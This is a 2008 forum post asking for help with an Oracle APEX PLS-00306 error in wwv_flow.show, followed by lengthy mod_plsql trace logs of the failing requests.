Error on /pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, c

Following on from the previous problem I had with Error 33331, we moved the application to a new APEX installation. Everything was fine for 30 mintes until
we started getting this error :-
PLS-00306: wrong number or types of arguments in call to 'SHOW'
I've put in tracing in the httpd.conf file at info level and switched on mod_plsql tracing. Everything went fine for another 40 minutes but we're now getting the same errors, the following is one of the mod_plsql trace files.
I have a hunch caching is at the root of the problem ?
<5952 ms>[ReqStartTime: 6/Feb/2008:16:13:59]
<5952 ms>Request ID ReqID:528620_1202314439
<5953 ms>Connecting to database with connect string : "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=mohawk)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=htmldb_p.world)))"
<5975 ms>Doing alter session set nls_language= "AMERICAN" nls_territory= "AMERICA"
<5975 ms>OpenCursor
<5976 ms>Altered session to nls_language=AMERICAN nls_territory=AMERICA
<5976 ms>DeinitCursor
<5976 ms>OpenCursor
<5977 ms>Status 1 (rc=0)
<5977 ms>DeinitCursor
<5977 ms>OpenCursor
<5978 ms>DBCharSet is AMERICAN_AMERICA.WE8ISO8859P1, OWAVersion 10.1.2.0.0, 1001020000 (rc=0)
<5978 ms>DeinitCursor
<5978 ms>OpenCursor
<5978 ms>(wpd.c,1765) Logged in as (unknown)
<5978 ms>(wpx.c,598) Going to select...
<5978 ms>(wpx.c,652) Have been asked to execute a request
<5978 ms>(wppa.c,334) Building Arglist based on Parsed Content from WRB
<5978 ms>(wppa.c,1016) Enter ParseUrlData
<5978 ms>POST
<5978 ms>(wpu.c,257) Attempting to read 147 bytes
<5978 ms>(wpu.c,262) We read 147, had 0, to get 0 bytes
<5978 ms>[headers begin]
<5978 ms>[headers end]
<5978 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
<5978 ms>[form_data]
<5978 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
<5978 ms>(wppa.c,1523) indx = 6, entryCnt = 6
<5978 ms>(wppa.c,1844) Listing distinct actual names:
<5978 ms>(wppa.c,1846) p_request
<5978 ms>(wppa.c,1846) p_instance
<5978 ms>(wppa.c,1846) p_flow_id
<5978 ms>(wppa.c,1846) p_flow_step_id
<5978 ms>(wppa.c,1846) p_arg_names
<5978 ms>(wppa.c,1846) p_arg_values
<5978 ms>(wppa.c,1848) Listing actuals of array with large entries:
<5978 ms>(wppa.c,1853) Listing distinct actual names and values:
<5978 ms>(wppa.c,1885) p_request, type = 0, value (35) = APPLICATION_PROCESS=get_Level23XML
<5978 ms>(wppa.c,1885) p_instance, type = 0, value (17) = 2989139092861589
<5978 ms>(wppa.c,1885) p_flow_id, type = 0, value (5) = 1122
<5978 ms>(wppa.c,1885) p_flow_step_id, type = 0, value (2) = 0
<5978 ms>(wppa.c,1885) p_arg_names, type = 0, value (15) = TEMPORARY_ITEM
<5978 ms>(wppa.c,1885) p_arg_values, type = 0, value (1) =
<5978 ms>(wppa.c,429) Arglist built, 6 unique entries
<5978 ms>(wpx.c,659) Going to wpprodb_OciDoBlock...
<5978 ms>(wpd.c,2750) Cache enabled. Gathering cache information.
<5978 ms>(wpd.c,2768) Language for this request is en-gb
<5978 ms>(wpd.c,2819) Using user APEX_PUBLIC_USER for caching.
<5978 ms>cache: Checking for user level hit
<5979 ms>cache: Cache MISS user - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/073/9629
<5979 ms>cache: Checking for system level hit
<5979 ms>cache: Cache MISS system - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/sys/374/2755
<5979 ms>(wppr.c,460) start working with wwv_flow.show
<5979 ms>(wppr.c,1164) The CALL block: len=1115, bind_count=14
declare
rc__ number;
start_time__ binary_integer;
simple_list__ owa_util.vc_arr;
complex_list__ owa_util.vc_arr;
begin
start_time__ := dbms_utility.get_time;
owa.init_cgi_env(:n__,:nm__,:v__);
htp.HTBUF_LEN := 63;
null;
null;
simple_list__(1) := 'sys.%';
simple_list__(2) := 'dbms\_%';
simple_list__(3) := 'utl\_%';
simple_list__(4) := 'owa\_%';
simple_list__(5) := 'owa.%';
simple_list__(6) := 'htp.%';
simple_list__(7) := 'htf.%';
simple_list__(8) := 'wpg_docload.%';
if ((owa_match.match_pattern('wwv_flow.show', simple_list__, complex_list__, true))) then
rc__ := 2;
else
null;
null;
wwv_flow.show(p_request=>:p_request,p_instance=>:p_instance,p_flow_id=>:p_flow_id,p_flow_step_id=>:p_flow_step_id,p_arg_names=>:p_arg_names,p_arg_values=>:p_arg_values);
if (wpg_docload.is_file_download) then
rc__ := 1;
wpg_docload.get_download_file(:doc_info);
null;
null;
null;
commit;
else
rc__ := 0;
null;
null;
null;
commit;
owa.get_page(:data__,:ndata__);
end if;
end if;
:rc__ := rc__;
:db_proc_time__ := dbms_utility.get_time - start_time__;
end;
<5979 ms>(wppr.c,520) Pl/sql block parsed...
<5979 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
<5979 ms> PLSQL_GATEWAY(14)=(6)WebDb
<5979 ms> GATEWAY_IVERSION(17)=(2)2
<5979 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
<5979 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
<5979 ms> SERVER_PORT(12)=(5)7777
<5979 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
<5979 ms> REQUEST_METHOD(15)=(5)POST
<5979 ms> PATH_INFO(10)=(15)/wwv_flow.show
<5979 ms> SCRIPT_NAME(12)=(10)/pls/apex
<5979 ms> REMOTE_ADDR(12)=(9)10.0.2.0
<5979 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
<5979 ms> REQUEST_PROTOCOL(17)=(5)HTTP
<5979 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
<5979 ms> HTTP_CONTENT_LENGTH(20)=(4)147
<5979 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
<5979 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
<5979 ms> HTTP_HOST(10)=(12)mohawk:7777
<5979 ms> HTTP_ACCEPT(12)=(4)*/*
<5979 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
<5979 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
<5979 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
<5979 ms> HTTP_ORACLE_ECID(17)=(36)1202314439:10.30.96.8:528620:0:22,0
<5979 ms> WEB_AUTHENT_PREFIX(19)=(1)
<5979 ms> DAD_NAME(9)=(5)apex
<5979 ms> DOC_ACCESS_PATH(16)=(5)docs
<5979 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
<5979 ms> PATH_ALIAS(11)=(1)
<5979 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
<5979 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
<5979 ms> SCRIPT_PREFIX(14)=(5)/pls
<5979 ms>StrArrPosBind pos 2 Charset Id : 873
<5979 ms>StrArrPosBind pos 3 Charset Id : 873
<5979 ms>StrArrPosBind pos 11 Charset Id : 873
<5984 ms>Execute: ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<5984 ms>(wppr.c,640) Execute:declare
objnum NUMBER;
objtyp NUMBER;
prename VARCHAR2(31);
name VARCHAR(31);
subname VARCHAR(31);
dblnk VARCHAR(31);
begin
dbms_utility.name_resolve(:objname, 1, prename, name, subname,
dblnk, objtyp, objnum);
if (name is null) then
sys.wpiutl.subpparam(objnum,subname,null,prename,:2,:3,:4,:5,:6,:7);
else
sys.wpiutl.subpparam(objnum,name,subname,prename,:2,:3,:4,:5,:6,:7);
end if;
exception
when others then :5 := 1;
end;
<5984 ms>(wppr.c,660) 6 parameter names
<5984 ms>StrArrPosBind pos 2 Charset Id : 873
<5984 ms>StrArrPosBind pos 3 Charset Id : 873
<5984 ms>StrArrPosBind pos 4 Charset Id : 873
<5985 ms>(wppr.c,704) misdefl=0, nenamei=0
<5985 ms>(wppr.c,744) print list of name, types, typeflags
<5985 ms>(wppr.c,797) parameter name: P_REQUEST, type: VARCHAR2, typeflags: 000
<5985 ms>(wppr.c,797) parameter name: P_INSTANCE, type: VARCHAR2, typeflags: 000
<5985 ms>(wppr.c,797) parameter name: P_FLOW_ID, type: VARCHAR2, typeflags: 000
<5985 ms>(wppr.c,797) parameter name: P_FLOW_STEP_ID, type: VARCHAR2, typeflags: 000
<5985 ms>(wppr.c,759) Array graduation (1=>4, 15=>32)
<5985 ms>(wppr.c,797) parameter name: P_ARG_NAMES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
<5985 ms>(wppr.c,759) Array graduation (1=>4, 1=>32)
<5985 ms>(wppr.c,797) parameter name: P_ARG_VALUES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
<5985 ms>(wppr.c,520) Pl/sql block parsed...
<5985 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
<5985 ms> PLSQL_GATEWAY(14)=(6)WebDb
<5985 ms> GATEWAY_IVERSION(17)=(2)2
<5985 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
<5985 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
<5985 ms> SERVER_PORT(12)=(5)7777
<5985 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
<5985 ms> REQUEST_METHOD(15)=(5)POST
<5985 ms> PATH_INFO(10)=(15)/wwv_flow.show
<5985 ms> SCRIPT_NAME(12)=(10)/pls/apex
<5985 ms> REMOTE_ADDR(12)=(9)10.0.2.0
<5985 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
<5985 ms> REQUEST_PROTOCOL(17)=(5)HTTP
<5985 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
<5985 ms> HTTP_CONTENT_LENGTH(20)=(4)147
<5985 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
<5985 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
<5985 ms> HTTP_HOST(10)=(12)mohawk:7777
<5985 ms> HTTP_ACCEPT(12)=(4)*/*
<5985 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
<5985 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
<5985 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
<5985 ms> HTTP_ORACLE_ECID(17)=(36)1202314439:10.30.96.8:528620:0:22,0
<5985 ms> WEB_AUTHENT_PREFIX(19)=(1)
<5985 ms> DAD_NAME(9)=(5)apex
<5985 ms> DOC_ACCESS_PATH(16)=(5)docs
<5985 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
<5985 ms> PATH_ALIAS(11)=(1)
<5985 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
<5985 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
<5985 ms> SCRIPT_PREFIX(14)=(5)/pls
<5985 ms>StrArrPosBind pos 2 Charset Id : 873
<5985 ms>StrArrPosBind pos 3 Charset Id : 873
<5985 ms>StrArrPosBind pos 8 Charset Id : 873
<5985 ms>StrArrPosBind pos 9 Charset Id : 873
<5985 ms>StrArrPosBind pos 11 Charset Id : 873
<5990 ms>ORA-6550 Execute ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<5991 ms>/pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<5991 ms>(wpu.c,595) longjumping back to the beginning
<5991 ms>(wpu.c,458) cleaning up before longjmp
<5991 ms>(wpu.c,462) doing a rollback
<5991 ms>(wpcs.c, 77) Executed 'rollback' (rc=0)
<5991 ms>(wpcs.c, 77) Executed 'begin dbms_session.reset_package; end;' (rc=0)
<5991 ms>(wpd.c,1820) Going to close cursor
<5991 ms>DeinitCursor
<5991 ms>(wpx.c,693) Shutdown has been called
<5991 ms>(wpx.c,705) Going to logoff
<5991 ms>Logoff: Pooling this connection
<5991 ms>[ReqEndtime: 6/Feb/2008:16:13:59]
<5991 ms>[ReqExecTime: 39 ms]
<3240798667 ms>[ReqStartTime: 6/Feb/2008:16:14:06]
<3240798667 ms>Request ID ReqID:528620_1202314446
<3240798667 ms>Connecting to database with connect string : "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=mohawk)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=htmldb_p.world)))"
<3240798667 ms>OpenCursor
<3240798667 ms>(wpd.c,1765) Logged in as (unknown)
<3240798667 ms>(wpx.c,598) Going to select...
<3240798667 ms>(wpx.c,652) Have been asked to execute a request
<3240798667 ms>(wppa.c,334) Building Arglist based on Parsed Content from WRB
<3240798667 ms>(wppa.c,1016) Enter ParseUrlData
<3240798667 ms>POST
<3240798667 ms>(wpu.c,257) Attempting to read 147 bytes
<3240798667 ms>(wpu.c,262) We read 147, had 0, to get 0 bytes
<3240798667 ms>[headers begin]
<3240798667 ms>[headers end]
<3240798667 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
<3240798667 ms>[form_data]
<3240798667 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=2989139092861589&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=
<3240798667 ms>(wppa.c,1523) indx = 6, entryCnt = 6
<3240798667 ms>(wppa.c,1844) Listing distinct actual names:
<3240798667 ms>(wppa.c,1846) p_request
<3240798667 ms>(wppa.c,1846) p_instance
<3240798667 ms>(wppa.c,1846) p_flow_id
<3240798667 ms>(wppa.c,1846) p_flow_step_id
<3240798667 ms>(wppa.c,1846) p_arg_names
<3240798667 ms>(wppa.c,1846) p_arg_values
<3240798668 ms>(wppa.c,1848) Listing actuals of array with large entries:
<3240798668 ms>(wppa.c,1853) Listing distinct actual names and values:
<3240798668 ms>(wppa.c,1885) p_request, type = 0, value (35) = APPLICATION_PROCESS=get_Level23XML
<3240798668 ms>(wppa.c,1885) p_instance, type = 0, value (17) = 2989139092861589
<3240798668 ms>(wppa.c,1885) p_flow_id, type = 0, value (5) = 1122
<3240798668 ms>(wppa.c,1885) p_flow_step_id, type = 0, value (2) = 0
<3240798668 ms>(wppa.c,1885) p_arg_names, type = 0, value (15) = TEMPORARY_ITEM
<3240798668 ms>(wppa.c,1885) p_arg_values, type = 0, value (1) =
<3240798668 ms>(wppa.c,429) Arglist built, 6 unique entries
<3240798668 ms>(wpx.c,659) Going to wpprodb_OciDoBlock...
<3240798668 ms>(wpd.c,2750) Cache enabled. Gathering cache information.
<3240798668 ms>(wpd.c,2768) Language for this request is en-gb
<3240798668 ms>(wpd.c,2819) Using user APEX_PUBLIC_USER for caching.
<3240798668 ms>cache: Checking for user level hit
<3240798668 ms>cache: Cache MISS user - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/073/9629
<3240798668 ms>cache: Checking for system level hit
<3240798668 ms>cache: Cache MISS system - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/sys/374/2755
<3240798668 ms>(wppr.c,460) start working with wwv_flow.show
<3240798668 ms>(wppr.c,1164) The CALL block: len=1115, bind_count=14
declare
rc__ number;
start_time__ binary_integer;
simple_list__ owa_util.vc_arr;
complex_list__ owa_util.vc_arr;
begin
start_time__ := dbms_utility.get_time;
owa.init_cgi_env(:n__,:nm__,:v__);
htp.HTBUF_LEN := 63;
null;
null;
simple_list__(1) := 'sys.%';
simple_list__(2) := 'dbms\_%';
simple_list__(3) := 'utl\_%';
simple_list__(4) := 'owa\_%';
simple_list__(5) := 'owa.%';
simple_list__(6) := 'htp.%';
simple_list__(7) := 'htf.%';
simple_list__(8) := 'wpg_docload.%';
if ((owa_match.match_pattern('wwv_flow.show', simple_list__, complex_list__, true))) then
rc__ := 2;
else
null;
null;
wwv_flow.show(p_request=>:p_request,p_instance=>:p_instance,p_flow_id=>:p_flow_id,p_flow_step_id=>:p_flow_step_id,p_arg_names=>:p_arg_names,p_arg_values=>:p_arg_values);
if (wpg_docload.is_file_download) then
rc__ := 1;
wpg_docload.get_download_file(:doc_info);
null;
null;
null;
commit;
else
rc__ := 0;
null;
null;
null;
commit;
owa.get_page(:data__,:ndata__);
end if;
end if;
:rc__ := rc__;
:db_proc_time__ := dbms_utility.get_time - start_time__;
end;
<3240798668 ms>(wppr.c,520) Pl/sql block parsed...
<3240798668 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
<3240798668 ms> PLSQL_GATEWAY(14)=(6)WebDb
<3240798668 ms> GATEWAY_IVERSION(17)=(2)3
<3240798668 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
<3240798668 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
<3240798668 ms> SERVER_PORT(12)=(5)7777
<3240798668 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
<3240798668 ms> REQUEST_METHOD(15)=(5)POST
<3240798668 ms> PATH_INFO(10)=(15)/wwv_flow.show
<3240798668 ms> SCRIPT_NAME(12)=(10)/pls/apex
<3240798668 ms> REMOTE_ADDR(12)=(9)10.0.2.0
<3240798668 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
<3240798668 ms> REQUEST_PROTOCOL(17)=(5)HTTP
<3240798668 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
<3240798668 ms> HTTP_CONTENT_LENGTH(20)=(4)147
<3240798668 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
<3240798668 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
<3240798668 ms> HTTP_HOST(10)=(12)mohawk:7777
<3240798668 ms> HTTP_ACCEPT(12)=(4)*/*
<3240798668 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
<3240798668 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
<3240798668 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
<3240798668 ms> HTTP_ORACLE_ECID(17)=(36)1202314446:10.30.96.8:528620:0:35,0
<3240798668 ms> WEB_AUTHENT_PREFIX(19)=(1)
<3240798668 ms> DAD_NAME(9)=(5)apex
<3240798668 ms> DOC_ACCESS_PATH(16)=(5)docs
<3240798668 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
<3240798668 ms> PATH_ALIAS(11)=(1)
<3240798668 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
<3240798668 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
<3240798668 ms> SCRIPT_PREFIX(14)=(5)/pls
<3240798668 ms>StrArrPosBind pos 2 Charset Id : 873
<3240798668 ms>StrArrPosBind pos 3 Charset Id : 873
<3240798668 ms>StrArrPosBind pos 11 Charset Id : 873
<3240798673 ms>Execute: ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<3240798673 ms>(wppr.c,640) Execute:declare
objnum NUMBER;
objtyp NUMBER;
prename VARCHAR2(31);
name VARCHAR(31);
subname VARCHAR(31);
dblnk VARCHAR(31);
begin
dbms_utility.name_resolve(:objname, 1, prename, name, subname,
dblnk, objtyp, objnum);
if (name is null) then
sys.wpiutl.subpparam(objnum,subname,null,prename,:2,:3,:4,:5,:6,:7);
else
sys.wpiutl.subpparam(objnum,name,subname,prename,:2,:3,:4,:5,:6,:7);
end if;
exception
when others then :5 := 1;
end;
<3240798673 ms>(wppr.c,660) 6 parameter names
<3240798673 ms>StrArrPosBind pos 2 Charset Id : 873
<3240798673 ms>StrArrPosBind pos 3 Charset Id : 873
<3240798673 ms>StrArrPosBind pos 4 Charset Id : 873
<3240798674 ms>(wppr.c,704) misdefl=0, nenamei=0
<3240798674 ms>(wppr.c,744) print list of name, types, typeflags
<3240798674 ms>(wppr.c,797) parameter name: P_REQUEST, type: VARCHAR2, typeflags: 000
<3240798674 ms>(wppr.c,797) parameter name: P_INSTANCE, type: VARCHAR2, typeflags: 000
<3240798674 ms>(wppr.c,797) parameter name: P_FLOW_ID, type: VARCHAR2, typeflags: 000
<3240798674 ms>(wppr.c,797) parameter name: P_FLOW_STEP_ID, type: VARCHAR2, typeflags: 000
<3240798674 ms>(wppr.c,759) Array graduation (1=>4, 15=>32)
<3240798674 ms>(wppr.c,797) parameter name: P_ARG_NAMES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
<3240798674 ms>(wppr.c,759) Array graduation (1=>4, 1=>32)
<3240798674 ms>(wppr.c,797) parameter name: P_ARG_VALUES, type: FLOWS_030000.WWV_FLOW_GLOBAL.VC_ARR2, typeflags: 001
<3240798674 ms>(wppr.c,520) Pl/sql block parsed...
<3240798674 ms>(wpdenv.c,1527) CGI Environment has 30 vars. Max name len 128, Max Value Len 128
<3240798674 ms> PLSQL_GATEWAY(14)=(6)WebDb
<3240798674 ms> GATEWAY_IVERSION(17)=(2)3
<3240798674 ms> SERVER_SOFTWARE(16)=(60)Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
<3240798674 ms> GATEWAY_INTERFACE(18)=(8)CGI/1.1
<3240798674 ms> SERVER_PORT(12)=(5)7777
<3240798674 ms> SERVER_NAME(12)=(22)mohawk.ventura-uk.com
<3240798674 ms> REQUEST_METHOD(15)=(5)POST
<3240798674 ms> PATH_INFO(10)=(15)/wwv_flow.show
<3240798674 ms> SCRIPT_NAME(12)=(10)/pls/apex
<3240798674 ms> REMOTE_ADDR(12)=(9)10.0.2.0
<3240798674 ms> SERVER_PROTOCOL(16)=(9)HTTP/1.1
<3240798674 ms> REQUEST_PROTOCOL(17)=(5)HTTP
<3240798674 ms> REMOTE_USER(12)=(17)APEX_PUBLIC_USER
<3240798674 ms> HTTP_CONTENT_LENGTH(20)=(4)147
<3240798674 ms> HTTP_CONTENT_TYPE(18)=(34)application/x-www-form-urlencoded
<3240798674 ms> HTTP_USER_AGENT(16)=(75)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
<3240798674 ms> HTTP_HOST(10)=(12)mohawk:7777
<3240798674 ms> HTTP_ACCEPT(12)=(4)*/*
<3240798674 ms> HTTP_ACCEPT_ENCODING(21)=(14)gzip, deflate
<3240798674 ms> HTTP_ACCEPT_LANGUAGE(21)=(6)en-gb
<3240798674 ms> HTTP_REFERER(13)=(123)http://mohawk:7777/pls/apex/f?p=1122:1:2989139092861589::::F101_CACHED_NTID,P1_STRADNAME,P2_STRADNAME:sw2802,sw2802,sw2802
<3240798674 ms> HTTP_ORACLE_ECID(17)=(36)1202314446:10.30.96.8:528620:0:35,0
<3240798674 ms> WEB_AUTHENT_PREFIX(19)=(1)
<3240798674 ms> DAD_NAME(9)=(5)apex
<3240798674 ms> DOC_ACCESS_PATH(16)=(5)docs
<3240798674 ms> DOCUMENT_TABLE(15)=(23)wwv_flow_file_objects$
<3240798674 ms> PATH_ALIAS(11)=(1)
<3240798674 ms> REQUEST_CHARSET(16)=(9)AL32UTF8
<3240798674 ms> REQUEST_IANA_CHARSET(21)=(6)UTF-8
<3240798674 ms> SCRIPT_PREFIX(14)=(5)/pls
<3240798674 ms>StrArrPosBind pos 2 Charset Id : 873
<3240798674 ms>StrArrPosBind pos 3 Charset Id : 873
<3240798675 ms>StrArrPosBind pos 8 Charset Id : 873
<3240798675 ms>StrArrPosBind pos 9 Charset Id : 873
<3240798675 ms>StrArrPosBind pos 11 Charset Id : 873
<3240798679 ms>ORA-6550 Execute ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<3240798680 ms>/pls/apex/wwv_flow.show HTTP-404 ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PLS-00306: wrong number or types of arguments in call to 'SHOW'
ORA-06550: line 25, column 3:
PL/SQL: Statement ignored
<3240798680 ms>(wpu.c,595) longjumping back to the beginning
<3240798680 ms>(wpu.c,458) cleaning up before longjmp
<3240798680 ms>(wpu.c,462) doing a rollback
<3240798680 ms>(wpcs.c, 77) Executed 'rollback' (rc=0)
<3240798680 ms>(wpcs.c, 77) Executed 'begin dbms_session.reset_package; end;' (rc=0)
<3240798680 ms>(wpd.c,1820) Going to close cursor
<3240798680 ms>DeinitCursor
<3240798680 ms>(wpx.c,693) Shutdown has been called
<3240798680 ms>(wpx.c,705) Going to logoff
<3240798680 ms>Logoff: Pooling this connection
<3240798680 ms>[ReqEndtime: 6/Feb/2008:16:14:06]
<3240798680 ms>[ReqExecTime: 13 ms]
<3240796167 ms>[ReqStartTime: 6/Feb/2008:16:23:03]
<3240796167 ms>Request ID ReqID:528620_1202314983
<3240796167 ms>Connecting to database with connect string : "(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=mohawk)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=htmldb_p.world)))"
<3240796167 ms>OpenCursor
<3240796167 ms>(wpd.c,1765) Logged in as (unknown)
<3240796168 ms>(wpx.c,598) Going to select...
<3240796168 ms>(wpx.c,652) Have been asked to execute a request
<3240796168 ms>(wppa.c,334) Building Arglist based on Parsed Content from WRB
<3240796168 ms>(wppa.c,1016) Enter ParseUrlData
<3240796168 ms>POST
<3240796168 ms>(wpu.c,257) Attempting to read 162 bytes
<3240796168 ms>(wpu.c,262) We read 162, had 0, to get 0 bytes
<3240796168 ms>[headers begin]
<3240796168 ms>[headers end]
<3240796168 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=1776222419881214&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=Balance%20query
<3240796168 ms>[form_data]
<3240796168 ms>p_request=APPLICATION_PROCESS%3Dget_Level23XML&p_instance=1776222419881214&p_flow_id=1122&p_flow_step_id=0&p_arg_names=TEMPORARY_ITEM&p_arg_values=Balance%20query
<3240796168 ms>(wppa.c,1523) indx = 6, entryCnt = 6
<3240796168 ms>(wppa.c,1844) Listing distinct actual names:
<3240796168 ms>(wppa.c,1846) p_request
<3240796168 ms>(wppa.c,1846) p_instance
<3240796168 ms>(wppa.c,1846) p_flow_id
<3240796168 ms>(wppa.c,1846) p_flow_step_id
<3240796168 ms>(wppa.c,1846) p_arg_names
<3240796168 ms>(wppa.c,1846) p_arg_values
<3240796168 ms>(wppa.c,1848) Listing actuals of array with large entries:
<3240796168 ms>(wppa.c,1853) Listing distinct actual names and values:
<3240796168 ms>(wppa.c,1885) p_request, type = 0, value (35) = APPLICATION_PROCESS=get_Level23XML
<3240796168 ms>(wppa.c,1885) p_instance, type = 0, value (17) = 1776222419881214
<3240796168 ms>(wppa.c,1885) p_flow_id, type = 0, value (5) = 1122
<3240796168 ms>(wppa.c,1885) p_flow_step_id, type = 0, value (2) = 0
<3240796168 ms>(wppa.c,1885) p_arg_names, type = 0, value (15) = TEMPORARY_ITEM
<3240796168 ms>(wppa.c,1885) p_arg_values, type = 0, value (14) = Balance query
<3240796168 ms>(wppa.c,429) Arglist built, 6 unique entries
<3240796168 ms>(wpx.c,659) Going to wpprodb_OciDoBlock...
<3240796168 ms>(wpd.c,2750) Cache enabled. Gathering cache information.
<3240796168 ms>(wpd.c,2768) Language for this request is en-gb
<3240796168 ms>(wpd.c,2819) Using user APEX_PUBLIC_USER for caching.
<3240796168 ms>cache: Checking for user level hit
<3240796168 ms>cache: Cache MISS user - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/022/4760
<3240796168 ms>cache: Checking for system level hit
<3240796168 ms>cache: Cache MISS system - /u01/app/oracle/product/10.2.0.1_html/Apache/modplsql/cache/plsql/sys/341/1694
